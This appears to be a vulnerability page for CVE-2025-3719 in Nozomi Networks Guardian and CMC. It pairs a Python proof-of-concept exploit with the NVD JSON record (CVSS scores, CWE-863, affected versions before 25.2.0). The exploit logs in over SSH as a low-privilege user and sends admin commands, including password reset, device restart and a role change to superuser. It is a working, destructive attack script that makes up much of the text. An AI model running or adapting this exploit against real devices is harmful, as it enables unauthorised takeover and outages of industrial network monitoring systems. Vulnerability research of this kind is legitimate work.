CVE-2025-3719

# CVE-2025-3719 PoC - CLI Access Control Bypass # This PoC demonstrates the access control vulnerability in Nozomi Networks CLI import paramiko import sys def exploit_cli_access_control(target_host, port, username, password): """ Exploit CVE-2025-3719: CLI Access Control Bypass Authenticated low-privilege user can execute admin CLI commands """ try: # Step 1: Establish SSH connection with low-privilege credentials client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) print(f"[*] Connecting to {target_host}:{port} as user '{username}'...") client.connect( hostname=target_host, port=port, username=username, password=password, timeout=10 ) print("[+] Authentication successful with low-privilege account") # Step 2: Invoke interactive shell shell = client.invoke_shell() # Step 3: Execute admin-level CLI commands (should be restricted) admin_commands = [ "show running-config", # View full configuration "configure terminal", # Enter global config mode "admin password reset", # Reset admin password "system restart", # Restart the device "user admin role superuser", # Modify user roles ] for cmd in admin_commands: print(f"\n[*] Executing admin command: {cmd}") shell.send(cmd + "\n") import time time.sleep(1) output = shell.recv(65535).decode('utf-8', errors='ignore') print(f"[+] Output:\n{output}") # Check if command was executed (vulnerability indicator) if "error" not in output.lower() and "denied" not in output.lower(): print(f"[!] VULNERABLE: Command '{cmd}' executed without proper authorization!") else: print(f"[-] Command '{cmd}' was denied (not vulnerable or patched)") client.close() return True except paramiko.AuthenticationException: print("[-] Authentication failed - valid credentials required") return False except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) != 5: print(f"Usage: {sys.argv[0]} <target_host> <port> <username> <password>") print(f"Example: {sys.argv[0]} 192.168.1.100 22 limiteduser password123") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) user = sys.argv[3] pwd = sys.argv[4] exploit_cli_access_control(target, port, user, pwd)

{"cve": {"id": "CVE-2025-3719", "sourceIdentifier": "[email protected]", "published": "2025-10-07T13:15:33.880", "lastModified": "2025-10-09T16:38:45.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An access control vulnerability was discovered in the CLI functionality due to a specific access restriction not being properly enforced for users with limited privileges. An authenticated user with limited privileges can issue administrative CLI commands, altering the device configuration, and/or affecting its availability."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nozominetworks:cmc:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.2.0", "matchCriteriaId": "6EE8E12E-EBAC-4B34-9D31-F68195E1F5CF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nozominetworks:guardian:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.2.0", "matchCriteriaId": "81AC5154-CA70-4917-8B33-D7AD5B57C683"}]}]}], "references": [{"url": "https://security.nozominetworks.com/NN-2025:5-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}